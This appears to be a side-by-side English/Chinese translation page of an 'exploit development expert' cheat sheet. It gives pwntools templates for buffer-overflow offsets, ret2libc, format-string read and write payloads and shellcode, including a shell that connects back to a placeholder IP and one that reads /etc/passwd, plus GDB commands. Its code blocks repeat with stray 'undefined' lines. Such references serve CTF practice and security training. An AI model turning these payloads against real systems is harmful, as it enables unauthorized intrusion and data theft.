Back to Details

exploit-dev-expert

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Exploit Development Expert

漏洞开发专家

Binary Exploitation Basics

二进制漏洞利用基础

Buffer Overflow

缓冲区溢出

python
from pwn import *
python
from pwn import *

Find offset

Find offset

cyclic(200) # Generate pattern cyclic_find(0x61616166) # Find offset
cyclic(200) # Generate pattern cyclic_find(0x61616166) # Find offset

Basic exploit

Basic exploit

offset = 64 ret_addr = p64(0x401234) payload = b'A' * offset + ret_addr
offset = 64 ret_addr = p64(0x401234) payload = b'A' * offset + ret_addr

With NX bypass (ret2libc)

With NX bypass (ret2libc)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh'))
undefined
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh'))
undefined

Format String

格式化字符串

python
undefined
python
undefined

Read from stack

Read from stack

payload = b'%x.' * 20 payload = b'%7$s' # Read specific position
payload = b'%x.' * 20 payload = b'%7$s' # Read specific position

Write to address

Write to address

payload = fmtstr_payload(offset, {target_addr: value})
undefined
payload = fmtstr_payload(offset, {target_addr: value})
undefined

Shellcode

Shellcode

python
undefined
python
undefined

Using pwntools

Using pwntools

context.arch = 'amd64' shellcode = asm(shellcraft.sh())
context.arch = 'amd64' shellcode = asm(shellcraft.sh())

Common shellcodes

Common shellcodes

shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT)
undefined
shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT)
undefined

Pwntools Essentials

Pwntools 核心用法

python
from pwn import *
python
from pwn import *

Setup

Setup

context.binary = ELF('./vuln') context.log_level = 'debug'
context.binary = ELF('./vuln') context.log_level = 'debug'

Connection

Connection

p = process('./vuln') # Local p = remote('ip', port) # Remote p = gdb.debug('./vuln') # With GDB
p = process('./vuln') # Local p = remote('ip', port) # Remote p = gdb.debug('./vuln') # With GDB

I/O

I/O

p.sendline(payload) p.recvuntil(b'>') data = p.recv(100)
p.sendline(payload) p.recvuntil(b'>') data = p.recv(100)

Interactive

Interactive

p.interactive()
undefined
p.interactive()
undefined

GDB Commands

GDB 常用命令

bash
gdb ./binary
> checksec                # Security features
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack
bash
gdb ./binary
> checksec                # Security features
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack